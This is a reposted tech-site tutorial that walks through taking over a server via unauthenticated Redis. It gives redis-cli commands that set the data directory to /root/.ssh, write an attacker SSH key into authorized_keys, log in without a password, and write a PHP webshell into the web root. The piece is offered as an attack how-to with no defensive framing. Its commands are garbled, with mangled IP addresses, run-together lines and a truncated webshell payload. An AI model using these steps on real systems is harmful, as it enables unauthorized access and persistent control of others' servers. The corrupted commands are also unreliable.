Unauthorized access to Redis causes the server to be controlled 03/26 Update SLTechnology News&Howtos

Unauthorized access to Redis causes the server to be controlled

2025-03-26 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)06/01 Report--

By using nmap scanning, it is found that the service corresponding to a port is Redis, and then we can try to see if it is unauthorized!

First install Redis tools using the following command:

Root@kali:~# apt-get install redis-tools

Then use the following command to see if the access is unauthorized:

Root@kali:~# redis-cli-h 10.198.131.110.198.131.1purl 6379 >

Then we can use secret-free login to carry out the relevant *:

Generate the public key:

Root@lsy:~/.ssh# ssh-keygen-t rsaroot@lsy:~/.ssh# cat id_rsa.pub ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lO+OSwj2zQuGON15ATfVwJAtLLbiswFoV/uqFHrw0BxaWSHTWgtrlzXyDen/ktDDBjfERlDys0vcZ3NQZ0/W+fWzbQkZbj/ABFsthhdQpdWWRz6wwOxY2tAKYhiZTcLchdFTnrU3+fkwD+im2W966A5UEZZmzTzTi/qA9BZwZghRrEx8Mr5+jVhQ8mYbR0QooggxTlafsavsBAG/aBTShoEanOuL4Pdx5aevmT3ydhwEJFwQQjBkARc8AUFY8cyS0/iPzT010uZYYHCPzhzm25QUSSbvIz9m7Mjwno72/OhKMCmVURkY4S1O4yXFzk+TlQ8P5jm+/pomKd++aPSn root@lsyroot@lsy:~/.ssh#

Write the public key to the remote server:

Root@lsy:~/.ssh# redis-cli-h 10.198.131.110.198.131.1CONFIG SET dbfilename authorized_keysOK10.198.131.1:6379 6379 > CONFIG SET dir / root/.ssh/OK10.198.131.1:6379 > CONFIG SET dbfilename authorized_keysOK10.198.131.1:6379 > set xxxx "\ n\ n\ nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lO+OSwj2zQuGON15ATfVwJAtLLbiswFoV/uqFHrw0BxaWSHTWgtrlzXyDen/ktDDBjfERlDys0vcZ3NQZ0/W+fWzbQkZbj/ABFsthhdQpdWWRz6wwOxY2tAKYhiZTcLchdFTnrU3+fkwD+im2W966A5UEZZmzTzTi/qA9BZwZghRrEx8Mr5+jVhQ8mYbR0QooggxTlafsavsBAG/aBTShoEanOuL4Pdx5aevmT3ydhwEJFwQQjBkARc8AUFY8cyS0/iPzT010uZYYHCPzhzm25QUSSbvIz9m7Mjwno72/OhKMCmVURkY4S1O4yXFzk+TlQ8P5jm+/pomKd++aPSn root@lsy\ n\ n" OK10.198.131.1:6379 > saveOK10.198.131.1:6379 > exit

To log in remotely using ssh:

Root@lsy:~/.ssh# ssh 10.198.131.1

Secret-free login succeeded:

Upload webshell

# redis-cli-h 192.168.2.5-p 6379192.168.2.5 set webshell 6379 > config set dir / var/wwww/html192.168.2.5:6379 > config set dbfilename 1.php192.168.2.5:6379 > set webshell "192.168.2.5purl 6379 > save

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.